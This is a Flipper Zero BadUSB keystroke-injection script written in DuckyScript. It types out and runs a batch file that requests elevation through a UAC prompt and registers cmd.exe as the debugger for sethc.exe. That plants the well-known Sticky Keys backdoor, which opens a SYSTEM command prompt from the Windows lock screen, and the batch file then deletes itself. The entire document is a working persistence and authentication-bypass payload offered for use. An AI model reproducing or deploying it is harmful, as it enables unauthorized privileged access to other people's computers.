REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment, REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr. REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account. REM Version: 1.0 REM Category: Remote_Access REM plug in second USB in before the Flipper DELAY 3000 CONTROL ESCAPE DELAY 500 STRING notepad DELAY 250 ENTER DELAY 750 STRING @echo off ENTER STRING :init ENTER STRING setlocal DisableDelayedExpansion ENTER STRING set cmdInvoke=1 ENTER STRING set winSysFolder=System32 ENTER STRING set "batchPath=%~0" ENTER STRING for %%k in (%0) do set batchName=%%~nk ENTER STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs" ENTER STRING setlocal EnableDelayedExpansion ENTER STRING :checkPrivileges ENTER STRING NET FILE 1>NUL 2>NUL ENTER STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges) ENTER STRING :getPrivileges ENTER STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges) ENTER STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%" ENTER STRING echo args = "ELEV " >> "%TEMPVBS%" ENTER STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%" ENTER STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%" ENTER STRING echo Next>> "%TEMPVBS%" ENTER STRING if '%cmdInvoke%'=='1' goto InvokeCmd ENTER STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%" ENTER STRING goto ExecElevation ENTER STRING :InvokeCmd ENTER STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%" ENTER STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%" ENTER STRING :ExecElevation ENTER STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %* ENTER STRING exit /B ENTER STRING :gotPrivileges ENTER STRING setlocal & cd /d "%~dp0." ENTER STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1) ENTER STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end ENTER STRING cls ENTER STRING echo Payload Install Failed ENTER STRING pause ENTER STRING :end ENTER STRING del /F /Q "%~0" && exit CONTROL s DELAY 500 STRING %temp%\run.bat TAB STRING a ENTER DELAY 250 ALT F4 DELAY 250 CONTROL ESCAPE DELAY 500 STRING %temp%\run.bat ENTER